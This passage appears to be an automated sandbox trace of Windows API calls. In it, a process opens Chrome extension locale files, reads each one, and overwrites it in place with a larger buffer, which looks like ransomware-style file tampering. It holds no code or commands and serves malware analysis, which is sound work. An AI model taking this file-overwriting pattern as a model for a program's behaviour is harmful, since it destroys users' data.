WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.js", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0159.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="main.js", cchWideChar=7, lpMultiByteStr=0x1f7ad44, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="main.js", lpUsedDefaultChar=0x0) returned 7 [0159.695] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fbad08, nNumberOfBytesToRead=0x5b, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbad08*, lpNumberOfBytesRead=0x331f2bc*=0x5b, lpOverlapped=0x0) returned 1 [0159.697] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.697] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e3, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x5e3, lpOverlapped=0x0) returned 1 [0159.697] CloseHandle (hObject=0x1dc) returned 1 [0159.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.698] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.699] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x104 [0159.699] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.699] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.699] ReleaseMutex (hMutex=0x168) returned 1 [0159.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.699] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x331f2bc*=0x104, lpOverlapped=0x0) returned 1 [0159.701] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.701] WriteFile (in: hFile=0x1dc, lpBuffer=0x2839428*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2839428*, lpNumberOfBytesWritten=0x331f2d0*=0x68c, lpOverlapped=0x0) returned 1 [0159.701] CloseHandle (hObject=0x1dc) returned 1 [0159.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0159.703] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.703] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd7 [0159.703] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0159.703] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.703] ReleaseMutex (hMutex=0x168) returned 1 [0159.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0159.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0159.704] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4f58, nNumberOfBytesToRead=0xd7, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4f58*, lpNumberOfBytesRead=0x331f2bc*=0xd7, lpOverlapped=0x0) returned 1 [0159.965] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0159.965] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65f, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x65f, lpOverlapped=0x0) returned 1 [0161.448] CloseHandle (hObject=0x1dc) returned 1 [0161.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.450] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.450] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xe4 [0161.450] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.450] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.450] ReleaseMutex (hMutex=0x168) returned 1 [0161.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.451] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xe4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x331f2bc*=0xe4, lpOverlapped=0x0) returned 1 [0161.452] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.452] WriteFile (in: hFile=0x1dc, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x66c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x331f2d0*=0x66c, lpOverlapped=0x0) returned 1 [0161.452] CloseHandle (hObject=0x1dc) returned 1 [0161.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.453] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.454] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xd5 [0161.454] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.454] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.454] ReleaseMutex (hMutex=0x168) returned 1 [0161.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.454] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xd5, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x331f2bc*=0xd5, lpOverlapped=0x0) returned 1 [0161.455] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.455] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x65d, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x65d, lpOverlapped=0x0) returned 1 [0161.456] CloseHandle (hObject=0x1dc) returned 1 [0161.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.457] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.457] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x108 [0161.457] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.457] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.457] ReleaseMutex (hMutex=0x168) returned 1 [0161.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.457] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ef2378, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2378*, lpNumberOfBytesRead=0x331f2bc*=0x108, lpOverlapped=0x0) returned 1 [0161.459] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.459] WriteFile (in: hFile=0x1dc, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x331f2d0*=0x690, lpOverlapped=0x0) returned 1 [0161.459] CloseHandle (hObject=0x1dc) returned 1 [0161.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.460] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.460] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x116 [0161.460] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.460] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.460] ReleaseMutex (hMutex=0x168) returned 1 [0161.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.461] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.461] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a5588, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a5588*, lpNumberOfBytesRead=0x331f2bc*=0x116, lpOverlapped=0x0) returned 1 [0161.462] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.462] WriteFile (in: hFile=0x1dc, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x69e, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x331f2d0*=0x69e, lpOverlapped=0x0) returned 1 [0161.462] CloseHandle (hObject=0x1dc) returned 1 [0161.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.463] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.463] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xf9 [0161.464] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.464] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.464] ReleaseMutex (hMutex=0x168) returned 1 [0161.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.464] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eeb308, nNumberOfBytesToRead=0xf9, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb308*, lpNumberOfBytesRead=0x331f2bc*=0xf9, lpOverlapped=0x0) returned 1 [0161.465] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.465] WriteFile (in: hFile=0x1dc, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x681, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x331f2d0*=0x681, lpOverlapped=0x0) returned 1 [0161.466] CloseHandle (hObject=0x1dc) returned 1 [0161.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.467] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.467] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x116 [0161.467] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.467] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.467] ReleaseMutex (hMutex=0x168) returned 1 [0161.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.467] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a5588, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a5588*, lpNumberOfBytesRead=0x331f2bc*=0x116, lpOverlapped=0x0) returned 1 [0161.468] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.469] WriteFile (in: hFile=0x1dc, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x69e, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x331f2d0*=0x69e, lpOverlapped=0x0) returned 1 [0161.469] CloseHandle (hObject=0x1dc) returned 1 [0161.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.470] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.470] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x11d [0161.470] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.470] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.470] ReleaseMutex (hMutex=0x168) returned 1 [0161.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.470] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a5588, nNumberOfBytesToRead=0x11d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a5588*, lpNumberOfBytesRead=0x331f2bc*=0x11d, lpOverlapped=0x0) returned 1 [0161.472] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.472] WriteFile (in: hFile=0x1dc, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x6a5, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x331f2d0*=0x6a5, lpOverlapped=0x0) returned 1 [0161.472] CloseHandle (hObject=0x1dc) returned 1 [0161.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.473] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.473] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x119 [0161.473] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.473] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.474] ReleaseMutex (hMutex=0x168) returned 1 [0161.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 